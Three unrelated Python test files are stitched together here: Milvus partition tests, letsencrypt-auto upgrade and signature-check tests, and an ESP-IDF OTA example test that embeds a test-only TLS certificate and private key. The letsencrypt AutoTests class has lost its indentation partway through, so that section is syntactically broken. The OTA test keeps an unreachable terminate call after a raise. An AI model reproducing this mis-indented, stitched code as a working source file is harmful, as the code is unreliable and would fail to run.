        collection_w = self.init_collection_wrap()
        # create partition
        partition_name = cf.gen_unique_str(prefix)
        partition_w = self.init_partition_wrap(collection_w, partition_name)
        assert collection_w.has_partition(partition_name)[0]
        # insert data to partition
        partition_w.insert(cf.gen_default_dataframe_data())
        # drop partition
        partition_w.drop()
        assert not collection_w.has_partition(partition_name)[0]
    @pytest.mark.tags(CaseLabel.L2)
    @pytest.mark.parametrize("data", [cf.gen_default_list_data(nb=3000)])
    @pytest.mark.parametrize("index_param", cf.gen_simple_index())
    def test_partition_drop_indexed_partition(self, data, index_param):
        """
        target: verify drop an indexed partition
        method: 1. create a partition
                2. insert some data
                3. create an index
                4. drop the partition
        expected: drop successfully
        """
        # create collection
        collection_w = self.init_collection_wrap()
        # create partition
        partition_name = cf.gen_unique_str(prefix)
        partition_w = self.init_partition_wrap(collection_w, partition_name)
        assert collection_w.has_partition(partition_name)[0]
        # insert data to partition
        ins_res, _ = partition_w.insert(data)
        assert len(ins_res.primary_keys) == len(data[0])
        # create index of collection
        collection_w.create_index(ct.default_float_vec_field_name, index_param)
        # drop partition
        partition_w.drop()
        assert not collection_w.has_partition(partition_name)[0]
    @pytest.mark.tags(CaseLabel.L1)
    def test_partition_release_empty_partition(self):
        """
        target: verify release an empty partition
        method: 1. create a partition
                2. release the partition
        expected: release successfully
        """
        # create partition
        partition_w = self.init_partition_wrap()
        assert partition_w.is_empty
        # release partition
        partition_w.release()
        # TODO: assert no more memory consumed
    @pytest.mark.tags(CaseLabel.L1)
    def test_partition_release_dropped_partition(self):
        """
        target: verify release a dropped partition
        method: 1. create a partition
                2. drop the partition
                3. release the partition
        expected: raise exception
        """
        # create partition
        partition_w = self.init_partition_wrap()
        # drop partition
        partition_w.drop()
        # release the dropped partition and check err response
        partition_w.release(check_task=CheckTasks.err_res,
                            check_items={ct.err_code: 1, ct.err_msg: PartitionErrorMessage.PartitionNotExist})
    @pytest.mark.tags(CaseLabel.L1)
    def test_partition_release_dropped_collection(self):
        """
        target: verify release a dropped collection
        method: 1. create a collection and partition
                2. drop the collection
                3. release the partition
        expected: raise exception
        """
        # create collection
        collection_w = self.init_collection_wrap()
        # create partition
        partition_name = cf.gen_unique_str(prefix)
        partition_w = self.init_partition_wrap(collection_w, partition_name)
        assert collection_w.has_partition(partition_name)[0]
        # drop collection
        collection_w.drop()
        # release the partition and check err response
        partition_w.release(check_task=CheckTasks.err_res,
                            check_items={ct.err_code: 1, ct.err_msg: "can't find collection"})
    @pytest.mark.tags(CaseLabel.L1)
    def test_partition_release_after_collection_released(self):
        """
        target: verify release a partition after the collection released
        method: 1. create a collection and partition
                2. insert some data
                3. release the collection
                4. release the partition
        expected: partition released successfully
        """
        # create collection
        collection_w = self.init_collection_wrap()
        # create partition
        partition_name = cf.gen_unique_str(prefix)
        partition_w = self.init_partition_wrap(collection_w, partition_name)
        assert collection_w.has_partition(partition_name)[0]
        # insert data to partition
        data = cf.gen_default_list_data()
        partition_w.insert(data)
        assert partition_w.num_entities == len(data[0])
        assert collection_w.num_entities == len(data[0])
        # load partition
        partition_w.load()
        # search of partition
        search_vectors = cf.gen_vectors(1, ct.default_dim)
        res_1, _ = partition_w.search(data=search_vectors,
                                      anns_field=ct.default_float_vec_field_name,
                                      params={"nprobe": 32}, limit=1)
        assert len(res_1) == 1
        # release collection; releasing the collection unloads its partitions
        collection_w.release()
        # search of partition
        res_2, _ = partition_w.search(data=search_vectors,
                                      anns_field=ct.default_float_vec_field_name,
                                      params={"nprobe": 32}, limit=1,
                                      check_task=ct.CheckTasks.err_res,
                                      check_items={ct.err_code: 0,
                                                   ct.err_msg: "not loaded into memory"})
        # release partition
        partition_w.release()
    @pytest.mark.tags(CaseLabel.L1)
    def test_partition_insert_default_partition(self):
        """
        target: verify insert data into _default partition
        method: 1. create a collection
                2. insert some data into _default partition
        expected: insert successfully
        """
        # create collection
        collection_w = self.init_collection_wrap()
        # get the default partition
        partition_name = ct.default_partition_name
        assert collection_w.has_partition(partition_name)[0]
        partition_w = self.init_partition_wrap(collection_w, partition_name)
        # insert data to partition
        data = cf.gen_default_dataframe_data()
        partition_w.insert(data)
        # self._connect().flush([collection_w.name])
        assert partition_w.num_entities == len(data)
    @pytest.mark.tags(CaseLabel.L1)
    def test_partition_insert_dropped_partition(self):
        """
        target: verify insert data into a dropped partition
        method: 1. create a collection
                2. insert some data into a dropped partition
        expected: raise exception
        """
        # create partition
        partition_w = self.init_partition_wrap()
        # drop partition
        partition_w.drop()
        # insert data to partition
        partition_w.insert(cf.gen_default_dataframe_data(),
                           check_task=CheckTasks.err_res,
                           check_items={ct.err_code: 1, ct.err_msg: "Partition not exist"})
        # TODO: update the assert error
    @pytest.mark.tags(CaseLabel.L1)
    def test_partition_insert_dropped_collection(self):
        """
        target: verify insert data into a dropped collection
        method: 1. create a collection
                2. insert some data into a dropped collection
        expected: raise exception
        """
        # create collection
        collection_w = self.init_collection_wrap()
        # create partition
        partition_name = cf.gen_unique_str(prefix)
        partition_w = self.init_partition_wrap(collection_w, partition_name)
        assert collection_w.has_partition(partition_name)[0]
        # drop collection
        collection_w.drop()
        # insert data to partition
        partition_w.insert(cf.gen_default_dataframe_data(),
                           check_task=CheckTasks.err_res,
                           check_items={ct.err_code: 1, ct.err_msg: "None Type"})
    @pytest.mark.tags(CaseLabel.L2)
    def test_partition_insert_maximum_size_data(self):
        """
        target: verify insert maximum size data(256M?) a time
        method: 1. create a partition
                2. insert maximum size data
        expected: insert successfully
        """
        # create collection
        collection_w = self.init_collection_wrap()
        # create partition
        partition_w = self.init_partition_wrap(collection_w)
        # insert data to partition
        max_size = 100000  # TODO: clarify the max size of data
        ins_res, _ = partition_w.insert(cf.gen_default_dataframe_data(max_size), timeout=40)
        assert len(ins_res.primary_keys) == max_size
        # self._connect().flush([collection_w.name])
        assert partition_w.num_entities == max_size
    @pytest.mark.tags(CaseLabel.L1)
    @pytest.mark.parametrize("dim", [ct.default_dim - 1, ct.default_dim + 1])
    def test_partition_insert_mismatched_dimensions(self, dim):
        """
        target: verify insert data with mismatched dimension
        method: 1. create a collection with default dim
                2. insert data with mismatched dim
        expected: raise exception
        """
        # create partition
        partition_w = self.init_partition_wrap()
        data = cf.gen_default_list_data(nb=10, dim=dim)
        # insert data to partition
        partition_w.insert(data, check_task=CheckTasks.err_res,
                           check_items={ct.err_code: 1, ct.err_msg: "but entities field dim"})
    @pytest.mark.tags(CaseLabel.L1)
    @pytest.mark.parametrize("sync", [True, False])
    def test_partition_insert_sync(self, sync):
        """
        target: verify insert sync
        method: 1. create a partition
                2. insert data in sync
        expected: insert successfully
        """
        pass
|
auto_test.py | """Tests for letsencrypt-auto"""
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
from contextlib import contextmanager
from functools import partial
from json import dumps
from os import chmod, environ
from os.path import abspath, dirname, exists, join
import re
from shutil import copy, rmtree
import socket
import ssl
from stat import S_IRUSR, S_IXUSR
from subprocess import CalledProcessError, Popen, PIPE
import sys
from tempfile import mkdtemp
from threading import Thread
from unittest import TestCase
from nose.tools import eq_, nottest, ok_
@nottest
def tests_dir():
    """Return a path to the "tests" directory."""
    this_file = abspath(__file__)
    return dirname(this_file)
sys.path.insert(0, dirname(tests_dir()))
from build import build as build_le_auto
class RequestHandler(BaseHTTPRequestHandler):
    """An HTTPS request handler which is quiet and serves a specific folder."""
    def __init__(self, resources, *args, **kwargs):
        """
        :arg resources: A dict of resource paths pointing to content bytes
        """
        # Store the resource map first: the base __init__ dispatches the
        # request immediately, so do_GET may run before __init__ returns.
        self.resources = resources
        BaseHTTPRequestHandler.__init__(self, *args, **kwargs)
    def log_message(self, format, *args):
        """Don't log each request to the terminal."""
    def do_GET(self):
        """Serve a GET request."""
        content = self.send_head()
        if content is not None:
            self.wfile.write(content)
    def send_head(self):
        """Common code for GET and HEAD commands
        This sends the response code and MIME headers and returns either a
        bytestring of content or, if none is found, None.
        """
        path = self.path[1:]  # Strip leading slash.
        content = self.resources.get(path)
        if content is None:
            self.send_error(404, 'Path "%s" not found in self.resources' % path)
        else:
            self.send_response(200)
            self.send_header('Content-type', 'text/plain')
            self.send_header('Content-Length', str(len(content)))
            self.end_headers()
        return content
def server_and_port(resources):
    """Return an unstarted HTTPS server and the port it will use.

    :arg resources: The resource dict handed to each RequestHandler
    """
    # The OS doesn't release the listening socket promptly after the server
    # shuts down, so scan a range of ports instead of reusing a fixed one.
    # Setting TCPServer.allow_reuse_address = True does not change this.
    for candidate_port in xrange(4443, 4543):
        try:
            server = HTTPServer(('localhost', candidate_port),
                                partial(RequestHandler, resources))
        except socket.error:
            continue  # port in use; try the next one
        server.socket = ssl.wrap_socket(
            server.socket,
            certfile=join(tests_dir(), 'certs', 'localhost', 'server.pem'),
            server_side=True)
        return server, candidate_port
    raise RuntimeError("Couldn't find an unused socket for the testing HTTPS server.")
@contextmanager
def serving(resources):
    """Spin up a local HTTPS server, and yield its base URL.
    Use a self-signed cert generated as outlined by
    https://coolaj86.com/articles/create-your-own-certificate-authority-for-
    testing/.
    """
    server, port = server_and_port(resources)
    # Serve from a background thread so the caller's block can run requests
    # against the URL; always shut down and join in the finally so the port
    # is freed even if the caller raises.
    thread = Thread(target=server.serve_forever)
    try:
        thread.start()
        yield 'https://localhost:{port}/'.format(port=port)
    finally:
        server.shutdown()
        thread.join()
LE_AUTO_PATH = join(dirname(tests_dir()), 'letsencrypt-auto')
@contextmanager
def ephemeral_dir():
    """Yield the path of a temporary directory, deleting it on exit."""
    tmp_path = mkdtemp(prefix='le-test-')
    try:
        yield tmp_path
    finally:
        rmtree(tmp_path)
def out_and_err(command, input=None, shell=False, env=None):
    """Run a shell command, and return stderr and stdout as string.
    If the command returns nonzero, raise CalledProcessError.
    :arg command: A list of commandline args
    :arg input: Data to pipe to stdin. Omit for none.
    Remaining args have the same meaning as for Popen.
    """
    proc = Popen(command,
                 stdin=PIPE,
                 stdout=PIPE,
                 stderr=PIPE,
                 shell=shell,
                 env=env)
    stdout, stderr = proc.communicate(input=input)
    # poll() after communicate() gives the final exit status, as in
    # subprocess.check_output().
    exit_code = proc.poll()
    if exit_code:
        failure = CalledProcessError(exit_code, command)
        failure.output = stdout  # attach captured stdout for callers
        raise failure
    return stdout, stderr
def signed(content, private_key_name='signing.key'):
    """Return the signed SHA-256 hash of ``content``, using the given key file."""
    key_path = join(tests_dir(), private_key_name)
    stdout, _ = out_and_err(
        ['openssl', 'dgst', '-sha256', '-sign', key_path],
        input=content)
    return stdout
def install_le_auto(contents, venv_dir):
    """Install some given source code as the letsencrypt-auto script at the
    root level of a virtualenv.
    :arg contents: The contents of the built letsencrypt-auto script
    :arg venv_dir: The path under which to install the script
    """
    script_path = join(venv_dir, 'letsencrypt-auto')
    with open(script_path, 'w') as script:
        script.write(contents)
    # Read + execute for the owner only, matching a deployed script.
    chmod(script_path, S_IRUSR | S_IXUSR)
def run_le_auto(venv_dir, base_url, **kwargs):
    """Run the prebuilt version of letsencrypt-auto, returning stdout and
    stderr strings.
    If the command returns other than 0, raise CalledProcessError.

    :arg venv_dir: Directory holding the letsencrypt-auto script under test
    :arg base_url: Base URL of the local test HTTPS server
    Extra keyword args become additional environment variables.
    """
    env = environ.copy()
    # Point the script at the local test server and test keys instead of
    # the real PyPI/GitHub endpoints.
    d = dict(XDG_DATA_HOME=venv_dir,
             # URL to PyPI-style JSON that tell us the latest released version
             # of LE:
             LE_AUTO_JSON_URL=base_url + 'certbot/json',
             # URL to dir containing letsencrypt-auto and letsencrypt-auto.sig:
             LE_AUTO_DIR_TEMPLATE=base_url + '%s/',
             # The public key corresponding to signing.key:
             LE_AUTO_PUBLIC_KEY="""-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAsMoSzLYQ7E1sdSOkwelg
tzKIh2qi3bpXuYtcfFC0XrvWig071NwIj+dZiT0OLZ2hPispEH0B7ISuuWg1ll7G
hFW0VdbxL6JdGzS2ShNWkX9hE9z+j8VqwDPOBn3ZHm03qwpYkBDwQib3KqOdYbTT
uUtJmmGcuk3a9Aq/sCT6DdfmTSdP5asdQYwIcaQreDrOosaS84DTWI3IU+UYJVgl
LsIVPBuy9IcgHidUQ96hJnoPsDCWsHwX62495QKEarauyKQrJzFes0EY95orDM47
Z5o/NDiQB11m91yNB0MmPYY9QSbnOA9j7IaaC97AwRLuwXY+/R2ablTcxurWou68
iQIDAQAB
-----END PUBLIC KEY-----""",
             **kwargs)
    env.update(d)
    # shell=True so the script's shebang/interpreter is resolved as in
    # normal use.
    return out_and_err(
        join(venv_dir, 'letsencrypt-auto') + ' --version',
        shell=True,
        env=env)
def set_le_script_version(venv_dir, version):
    """Tell the letsencrypt script to report a certain version.
    We actually replace the script with a dummy version that knows only how to
    print its version.
    """
    dummy_script = ("#!/usr/bin/env python\n"
                    "from sys import stderr\n"
                    "stderr.write('letsencrypt %s\\n')" % version)
    script_path = join(venv_dir, 'letsencrypt', 'bin', 'letsencrypt')
    with open(script_path, 'w') as script:
        script.write(dummy_script)
class AutoTests(TestCase):
"""Test the major branch points of letsencrypt-auto:
* An le-auto upgrade is needed.
* An le-auto upgrade is not needed.
* There was an out-of-date LE script installed.
* There was a current LE script installed.
* There was no LE script installed (less important).
* Pip hash-verification passes.
* Pip has a hash mismatch.
* The OpenSSL sig matches.
* The OpenSSL sig mismatches.
For tests which get to the end, we run merely ``letsencrypt --version``.
The functioning of the rest of the certbot script is covered by other
test suites.
"""
def test_successes(self):
"""Exercise most branches of letsencrypt-auto.
They just happen to be the branches in which everything goes well.
I violate my usual rule of having small, decoupled tests, because...
1. We shouldn't need to run a Cartesian product of the branches: the
phases run in separate shell processes, containing state leakage
pretty effectively. The only shared state is FS state, and it's
limited to a temp dir, assuming (if we dare) all functions properly.
2. One combination of branches happens to set us up nicely for testing
the next, saving code.
"""
NEW_LE_AUTO = build_le_auto(
version='99.9.9',
requirements='letsencrypt==99.9.9 --hash=sha256:1cc14d61ab424cdee446f51e50f1123f8482ec740587fe78626c933bba2873a0')
NEW_LE_AUTO_SIG = signed(NEW_LE_AUTO)
with ephemeral_dir() as venv_dir:
# This serves a PyPI page with a higher version, a GitHub-alike
# with a corresponding le-auto script, and a matching signature.
resources = {'certbot/json': dumps({'releases': {'99.9.9': None}}),
'v99.9.9/letsencrypt-auto': NEW_LE_AUTO,
'v99.9.9/letsencrypt-auto.sig': NEW_LE_AUTO_SIG}
with serving(resources) as base_url:
run_letsencrypt_auto = partial(
run_le_auto,
venv_dir,
base_url,
PIP_FIND_LINKS=join(tests_dir(),
'fake-letsencrypt',
'dist'))
# Test when a phase-1 upgrade is needed, there's no LE binary
# installed, and pip hashes verify:
install_le_auto(build_le_auto(version='50.0.0'), venv_dir)
out, err = run_letsencrypt_auto()
ok_(re.match(r'letsencrypt \d+\.\d+\.\d+',
err.strip().splitlines()[-1]))
# Make a few assertions to test the validity of the next tests:
self.assertIn('Upgrading certbot-auto ', out)
self.assertIn('Creating virtual environment...', out)
# Now we have le-auto 99.9.9 and LE 99.9.9 installed. This
# conveniently sets us up to test the next 2 cases.
# Test when neither phase-1 upgrade nor phase-2 upgrade is
# needed (probably a common case):
out, err = run_letsencrypt_auto()
self.assertNotIn('Upgrading certbot-auto ', out)
self.assertNotIn('Creating virtual environment...', out)
# Test when a phase-1 upgrade is not needed but a phase-2
# upgrade is:
set_le_script_version(venv_dir, '0.0.1')
out, err = run_letsencrypt_auto()
self.assertNotIn('Upgrading certbot-auto ', out)
self.assertIn('Creating virtual environment...', out)
def test_openssl_failure(self):
"""Make sure we stop if the openssl signature check fails."""
with ephemeral_dir() as venv_dir:
# Serve an unrelated hash signed with the good key (easier than
# making a bad key, and a mismatch is a mismatch):
resources = {'': '<a href="certbot/">certbot/</a>',
'certbot/json': dumps({'releases': {'99.9.9': None}}),
'v99.9.9/letsencrypt-auto': build_le_auto(version='99.9.9'),
'v99.9.9/letsencrypt-auto.sig': signed('something else')}
with serving(resources) as base_url:
copy(LE_AUTO_PATH, venv_dir)
try:
out, err = run_le_auto(venv_dir, base_url)
except CalledProcessError as exc:
eq_(exc.returncode, 1)
self.assertIn("Couldn't verify signature of downloaded "
"certbot-auto.",
exc.output)
else:
self.fail('Signature check on certbot-auto erroneously passed.')
    def test_pip_failure(self):
        """Make sure pip stops us if there is a hash mismatch."""
        with ephemeral_dir() as venv_dir:
            resources = {'': '<a href="certbot/">certbot/</a>',
                         'certbot/json': dumps({'releases': {'99.9.9': None}})}
            with serving(resources) as base_url:
                # Build a le-auto script embedding a bad requirements file:
                install_le_auto(
                    build_le_auto(
                        version='99.9.9',
                        requirements='configobj==5.0.6 --hash=sha256:badbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadb'),
                    venv_dir)
                try:
                    out, err = run_le_auto(venv_dir, base_url)
                except CalledProcessError as exc:
                    # pip must fail the hash check and exit nonzero...
                    eq_(exc.returncode, 1)
                    self.assertIn("THESE PACKAGES DO NOT MATCH THE HASHES "
                                  "FROM THE REQUIREMENTS FILE",
                                  exc.output)
                    # ...and the half-built virtualenv must not be left behind.
                    ok_(not exists(join(venv_dir, 'letsencrypt')),
                        msg="The virtualenv was left around, even though "
                            "installation didn't succeed. We shouldn't do "
                            "this, as it foils our detection of whether we "
                            "need to recreate the virtualenv, which hinges "
                            "on the presence of $VENV_BIN/letsencrypt.")
                else:
                    self.fail("Pip didn't detect a bad hash and stop the "
                              "installation.")
|
example_test.py | import http.server
import multiprocessing
import os
import random
import re
import socket
import ssl
import struct
import subprocess
import ttfw_idf
from tiny_test_fw import DUT
# Self-signed TLS certificate (PEM) embedded in the test. get_ca_cert()
# writes it to server_cert.pem so the local HTTPS / openssl servers can use it.
server_cert = '-----BEGIN CERTIFICATE-----\n' \
              'MIIDWDCCAkACCQCbF4+gVh/MLjANBgkqhkiG9w0BAQsFADBuMQswCQYDVQQGEwJJ\n'\
              'TjELMAkGA1UECAwCTUgxDDAKBgNVBAcMA1BVTjEMMAoGA1UECgwDRVNQMQwwCgYD\n'\
              'VQQLDANFU1AxDDAKBgNVBAMMA0VTUDEaMBgGCSqGSIb3DQEJARYLZXNwQGVzcC5j\n'\
              'b20wHhcNMjEwNzEyMTIzNjI3WhcNNDEwNzA3MTIzNjI3WjBuMQswCQYDVQQGEwJJ\n'\
              'TjELMAkGA1UECAwCTUgxDDAKBgNVBAcMA1BVTjEMMAoGA1UECgwDRVNQMQwwCgYD\n'\
              'VQQLDANFU1AxDDAKBgNVBAMMA0VTUDEaMBgGCSqGSIb3DQEJARYLZXNwQGVzcC5j\n'\
              'b20wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDhxF/y7bygndxPwiWL\n'\
              'SwS9LY3uBMaJgup0ufNKVhx+FhGQOu44SghuJAaH3KkPUnt6SOM8jC97/yQuc32W\n'\
              'ukI7eBZoA12kargSnzdv5m5rZZpd+NznSSpoDArOAONKVlzr25A1+aZbix2mKRbQ\n'\
              'S5w9o1N2BriQuSzd8gL0Y0zEk3VkOWXEL+0yFUT144HnErnD+xnJtHe11yPO2fEz\n'\
              'YaGiilh0ddL26PXTugXMZN/8fRVHP50P2OG0SvFpC7vghlLp4VFM1/r3UJnvL6Oz\n'\
              '3ALc6dhxZEKQucqlpj8l1UegszQToopemtIj0qXTHw2+uUnkUyWIPjPC+wdOAoap\n'\
              'rFTRAgMBAAEwDQYJKoZIhvcNAQELBQADggEBAItw24y565k3C/zENZlxyzto44ud\n'\
              'IYPQXN8Fa2pBlLe1zlSIyuaA/rWQ+i1daS8nPotkCbWZyf5N8DYaTE4B0OfvoUPk\n'\
              'B5uGDmbuk6akvlB5BGiYLfQjWHRsK9/4xjtIqN1H58yf3QNROuKsPAeywWS3Fn32\n'\
              '3//OpbWaClQePx6udRYMqAitKR+QxL7/BKZQsX+UyShuq8hjphvXvk0BW8ONzuw9\n'\
              'RcoORxM0FzySYjeQvm4LhzC/P3ZBhEq0xs55aL2a76SJhq5hJy7T/Xz6NFByvlrN\n'\
              'lFJJey33KFrAf5vnV9qcyWFIo7PYy2VsaaEjFeefr7q3sTFSMlJeadexW2Y=\n'\
              '-----END CERTIFICATE-----\n'
# Matching private key (PEM) for server_cert above; written to server_key.pem
# by get_ca_cert(). Test-only material — not a secret worth protecting.
server_key = '-----BEGIN PRIVATE KEY-----\n'\
             'MIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQDhxF/y7bygndxP\n'\
             'wiWLSwS9LY3uBMaJgup0ufNKVhx+FhGQOu44SghuJAaH3KkPUnt6SOM8jC97/yQu\n'\
             'c32WukI7eBZoA12kargSnzdv5m5rZZpd+NznSSpoDArOAONKVlzr25A1+aZbix2m\n'\
             'KRbQS5w9o1N2BriQuSzd8gL0Y0zEk3VkOWXEL+0yFUT144HnErnD+xnJtHe11yPO\n'\
             '2fEzYaGiilh0ddL26PXTugXMZN/8fRVHP50P2OG0SvFpC7vghlLp4VFM1/r3UJnv\n'\
             'L6Oz3ALc6dhxZEKQucqlpj8l1UegszQToopemtIj0qXTHw2+uUnkUyWIPjPC+wdO\n'\
             'AoaprFTRAgMBAAECggEAE0HCxV/N1Q1h+1OeDDGL5+74yjKSFKyb/vTVcaPCrmaH\n'\
             'fPvp0ddOvMZJ4FDMAsiQS6/n4gQ7EKKEnYmwTqj4eUYW8yxGUn3f0YbPHbZT+Mkj\n'\
             'z5woi3nMKi/MxCGDQZX4Ow3xUQlITUqibsfWcFHis8c4mTqdh4qj7xJzehD2PVYF\n'\
             'gNHZsvVj6MltjBDAVwV1IlGoHjuElm6vuzkfX7phxcA1B4ZqdYY17yCXUnvui46z\n'\
             'Xn2kUTOOUCEgfgvGa9E+l4OtdXi5IxjaSraU+dlg2KsE4TpCuN2MEVkeR5Ms3Y7Q\n'\
             'jgJl8vlNFJDQpbFukLcYwG7rO5N5dQ6WWfVia/5XgQKBgQD74at/bXAPrh9NxPmz\n'\
             'i1oqCHMDoM9sz8xIMZLF9YVu3Jf8ux4xVpRSnNy5RU1gl7ZXbpdgeIQ4v04zy5aw\n'\
             '8T4tu9K3XnR3UXOy25AK0q+cnnxZg3kFQm+PhtOCKEFjPHrgo2MUfnj+EDddod7N\n'\
             'JQr9q5rEFbqHupFPpWlqCa3QmQKBgQDldWUGokNaEpmgHDMnHxiibXV5LQhzf8Rq\n'\
             'gJIQXb7R9EsTSXEvsDyqTBb7PHp2Ko7rZ5YQfyf8OogGGjGElnPoU/a+Jij1gVFv\n'\
             'kZ064uXAAISBkwHdcuobqc5EbG3ceyH46F+FBFhqM8KcbxJxx08objmh58+83InN\n'\
             'P9Qr25Xw+QKBgEGXMHuMWgQbSZeM1aFFhoMvlBO7yogBTKb4Ecpu9wI5e3Kan3Al\n'\
             'pZYltuyf+VhP6XG3IMBEYdoNJyYhu+nzyEdMg8CwXg+8LC7FMis/Ve+o7aS5scgG\n'\
             '1to/N9DK/swCsdTRdzmc/ZDbVC+TuVsebFBGYZTyO5KgqLpezqaIQrTxAoGALFCU\n'\
             '10glO9MVyl9H3clap5v+MQ3qcOv/EhaMnw6L2N6WVT481tnxjW4ujgzrFcE4YuxZ\n'\
             'hgwYu9TOCmeqopGwBvGYWLbj+C4mfSahOAs0FfXDoYazuIIGBpuv03UhbpB1Si4O\n'\
             'rJDfRnuCnVWyOTkl54gKJ2OusinhjztBjcrV1XkCgYEA3qNi4uBsPdyz9BZGb/3G\n'\
             'rOMSw0CaT4pEMTLZqURmDP/0hxvTk1polP7O/FYwxVuJnBb6mzDa0xpLFPTpIAnJ\n'\
             'YXB8xpXU69QVh+EBbemdJWOd+zp5UCfXvb2shAeG3Tn/Dz4cBBMEUutbzP+or0nG\n'\
             'vSXnRLaxQhooWm+IuX9SuBQ=\n'\
             '-----END PRIVATE KEY-----\n'
def get_my_ip():
    """Return the host's outbound IPv4 address as a string."""
    # "Connecting" a UDP socket to a public address does not send any
    # packet; it only makes the kernel pick the outgoing interface, whose
    # address getsockname() then reports.
    probe = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        probe.connect(('8.8.8.8', 80))
        return probe.getsockname()[0]
    finally:
        probe.close()
def get_server_status(host_ip, port):
    """Return True if a TCP connection to (host_ip, port) succeeds, else False.

    Used to decide whether an HTTPS file server is already listening before
    spawning a new one.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        # connect_ex() returns 0 on success and an errno value on failure,
        # so the comparison yields the boolean directly.
        return sock.connect_ex((host_ip, port)) == 0
    finally:
        # Close the probe socket even if connect_ex raises.
        sock.close()
def create_file(server_file, file_data):
    """Create (or truncate) *server_file* and write *file_data* into it."""
    handle = open(server_file, 'w+')
    try:
        handle.write(file_data)
    finally:
        handle.close()
def get_ca_cert(ota_image_dir):
    """Materialise the embedded TLS cert/key as PEM files in *ota_image_dir*.

    Also chdirs into the directory as a side effect. Returns the tuple
    (cert_path, key_path).
    """
    os.chdir(ota_image_dir)
    cert_path = os.path.join(ota_image_dir, 'server_cert.pem')
    key_path = os.path.join(ota_image_dir, 'server_key.pem')
    create_file(cert_path, server_cert)
    create_file(key_path, server_key)
    return cert_path, key_path
def https_request_handler():
    """
    Returns a request handler class that handles broken pipe exception
    """
    class RequestHandler(http.server.SimpleHTTPRequestHandler):
        def finish(self):
            # Flush and close the write side first, swallowing socket errors
            # (e.g. a client that disconnected mid-response); the read side
            # is closed unconditionally afterwards.
            try:
                if not self.wfile.closed:
                    self.wfile.flush()
                    self.wfile.close()
            except socket.error:
                pass
            self.rfile.close()

        def handle(self):
            # A client dropping the connection mid-request must not take the
            # whole server down, so socket errors are ignored here too.
            try:
                http.server.BaseHTTPRequestHandler.handle(self)
            except socket.error:
                pass

    return RequestHandler
def start_https_server(ota_image_dir, server_ip, server_port):
    """Serve *ota_image_dir* over HTTPS forever.

    Intended to run in a child process (see the multiprocessing.Process
    callers below); serve_forever() never returns.
    """
    server_file, key_file = get_ca_cert(ota_image_dir)
    requestHandler = https_request_handler()
    httpd = http.server.HTTPServer((server_ip, server_port), requestHandler)
    # ssl.wrap_socket() was deprecated since Python 3.7 and removed in 3.12;
    # an SSLContext is the supported replacement with identical behavior here.
    context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    context.load_cert_chain(certfile=server_file, keyfile=key_file)
    httpd.socket = context.wrap_socket(httpd.socket, server_side=True)
    httpd.serve_forever()
def start_chunked_server(ota_image_dir, server_port):
    """Launch `openssl s_server -WWW` to serve *ota_image_dir* over TLS.

    Returns the Popen handle so the caller can kill() the server later.
    """
    cert_path, key_path = get_ca_cert(ota_image_dir)
    cmd = [
        'openssl', 's_server',
        '-WWW',
        '-key', key_path,
        '-cert', cert_path,
        '-port', str(server_port),
    ]
    return subprocess.Popen(cmd)
@ttfw_idf.idf_example_test(env_tag='EXAMPLE_ETH_OTA')
def test_examples_protocol_native_ota_example(env, extra_data):
    """
    This is a positive test case, which downloads complete binary file multiple number of times.
    Number of iterations can be specified in variable iterations.
    steps: |
      1. join AP
      2. Fetch OTA image over HTTPS
      3. Reboot with the new OTA image
    """
    dut1 = env.get_dut('native_ota_example', 'examples/system/ota/native_ota_example', dut_class=ttfw_idf.ESP32DUT)
    server_port = 8002
    # No. of times working of application is to be validated
    iterations = 3
    # File to be downloaded. This file is generated after compilation
    bin_name = 'native_ota.bin'
    # check and log bin size
    binary_file = os.path.join(dut1.app.binary_path, bin_name)
    bin_size = os.path.getsize(binary_file)
    ttfw_idf.log_performance('native_ota_bin_size', '{}KB'.format(bin_size // 1024))
    # start test
    host_ip = get_my_ip()
    # Spawn the local HTTPS file server only if nothing already listens there.
    if (get_server_status(host_ip, server_port) is False):
        thread1 = multiprocessing.Process(target=start_https_server, args=(dut1.app.binary_path, host_ip, server_port))
        thread1.daemon = True
        thread1.start()
    dut1.start_app()
    for i in range(iterations):
        dut1.expect('Loaded app from partition at offset', timeout=30)
        try:
            ip_address = dut1.expect(re.compile(r' (sta|eth) ip: ([^,]+),'), timeout=30)
            print('Connected to AP with IP: {}'.format(ip_address))
        except DUT.ExpectTimeout:
            raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
            # NOTE(review): unreachable — the raise above exits first.
            thread1.terminate()
        dut1.expect('Starting OTA example', timeout=30)
        print('writing to device: {}'.format('https://' + host_ip + ':' + str(server_port) + '/' + bin_name))
        # Send the OTA URL to the DUT, then expect the post-OTA reboot banner.
        dut1.write('https://' + host_ip + ':' + str(server_port) + '/' + bin_name)
        dut1.expect('Loaded app from partition at offset', timeout=60)
        dut1.expect('Starting OTA example', timeout=30)
        dut1.reset()
    thread1.terminate()
@ttfw_idf.idf_example_test(env_tag='EXAMPLE_ETH_OTA')
def test_examples_protocol_native_ota_example_truncated_bin(env, extra_data):
    """
    Working of OTA if binary file is truncated is validated in this test case.
    Application should return with error message in this case.
    steps: |
      1. join AP
      2. Generate truncated binary file
      3. Fetch OTA image over HTTPS
      4. Check working of code if bin is truncated
    """
    dut1 = env.get_dut('native_ota_example', 'examples/system/ota/native_ota_example', dut_class=ttfw_idf.ESP32DUT)
    server_port = 8002
    # Original binary file generated after compilation
    bin_name = 'native_ota.bin'
    # Truncated binary file to be generated from original binary file
    truncated_bin_name = 'truncated.bin'
    # Size of truncated file to be generated. This value can range from 288 bytes (image header size)
    # to the size of the original binary; 64000 keeps the test-case runtime short.
    truncated_bin_size = 64000
    # Produce the truncated copy: first truncated_bin_size bytes of the image.
    binary_file = os.path.join(dut1.app.binary_path, bin_name)
    f = open(binary_file, 'rb+')
    fo = open(os.path.join(dut1.app.binary_path, truncated_bin_name), 'wb+')
    fo.write(f.read(truncated_bin_size))
    fo.close()
    f.close()
